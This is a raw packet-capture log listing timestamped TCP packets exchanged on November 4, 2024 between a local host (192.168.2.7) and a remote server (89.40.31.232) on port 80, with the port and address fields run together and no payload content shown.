                                                              Nov 4, 2024 09:27:58.192857027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192857027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192874908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192883015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192888975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192899942 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192903042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192922115 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192926884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192949057 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.192956924 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.192987919 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.193042994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193057060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193068027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193078041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.193087101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193095922 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.193101883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193118095 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193121910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.193130970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.193150997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.193176031 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.223459005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.223479986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.223491907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.223594904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.267862082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.267905951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.267919064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.267925978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.267967939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.267978907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.268007994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.268052101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289284945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289341927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289411068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289452076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289463997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289479971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289494038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289508104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289525032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289527893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289535999 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289545059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289566040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289566994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289586067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289596081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289628983 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289642096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289654970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289674044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289683104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289697886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289710045 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289724112 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289747953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289750099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289764881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289777994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289805889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289815903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289829016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289830923 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289841890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289854050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289858103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289870024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289870024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289894104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289911985 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289915085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289930105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289952993 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289967060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289968014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.289980888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.289994001 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290019989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290024996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290038109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290046930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290050983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290064096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290070057 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290090084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290113926 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290117979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290132999 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290143967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290158033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290169954 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290170908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290196896 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290215015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290240049 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290252924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290266991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290281057 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290292978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290311098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290426016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290437937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290451050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290468931 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290497065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290498972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290513992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290539026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290541887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290558100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290570974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290585041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290606022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290648937 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290690899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290738106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290779114 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290797949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290811062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.290838003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290863991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.290914059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291049004 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291059971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291073084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291090965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.291093111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291107893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291116953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.291138887 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.291167021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.291173935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291187048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.291213989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.291225910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306387901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306408882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306457043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306468010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306494951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306509972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306627035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306627035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306627035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306627035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306632996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306648970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306663036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306674957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306688070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306689978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306695938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306736946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306787014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306811094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306821108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306840897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306852102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306859016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306866884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306890011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306900978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306914091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306915045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.306946039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306957960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.306996107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307008982 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307020903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307038069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307053089 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307065964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307080984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307096004 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307128906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307142973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307153940 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307157993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307168961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307179928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307187080 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307192087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307199955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307207108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307218075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307235956 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307239056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307251930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307254076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307266951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307285070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307297945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307298899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307310104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307328939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307332039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307338953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307365894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307384968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307396889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307409048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307420969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307431936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307435036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307446957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307449102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307463884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307492018 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307492018 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307517052 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307533979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307547092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307559013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307569027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307580948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307580948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307590008 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307600021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307615042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307619095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307630062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307632923 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307643890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307660103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307672977 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307691097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307739973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307754040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307765961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307779074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307794094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307794094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307817936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307832003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307835102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307847977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307859898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307872057 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307883978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307897091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307923079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307923079 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307938099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307950020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307961941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307964087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.307975054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.307991982 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308032036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308470964 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308484077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308496952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308510065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308520079 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308532000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308563948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308598042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308612108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308626890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308639050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308644056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308654070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308655977 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308676004 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308689117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308701992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308702946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308715105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308726072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308728933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308742046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308753967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308772087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308798075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308810949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308823109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308836937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308849096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308850050 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308875084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308892965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.308953047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308965921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308979034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.308990955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309003115 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309005976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309031963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309036016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309045076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309052944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309084892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309108019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309120893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309133053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309146881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309159040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309161901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309171915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309171915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309199095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309209108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309222937 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309225082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309240103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309252977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309256077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309276104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309298038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309324980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309338093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309350014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309361935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309370995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309376955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309391975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309396982 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309410095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309437990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309437990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309453011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309464931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309478045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309489012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309505939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309521914 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309545994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309561968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309576035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309587955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309601068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309603930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309616089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309617996 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309637070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309645891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309657097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309660912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309684038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309690952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309699059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.309726000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.309751987 CET4993280192.168.2.789.40.31.232
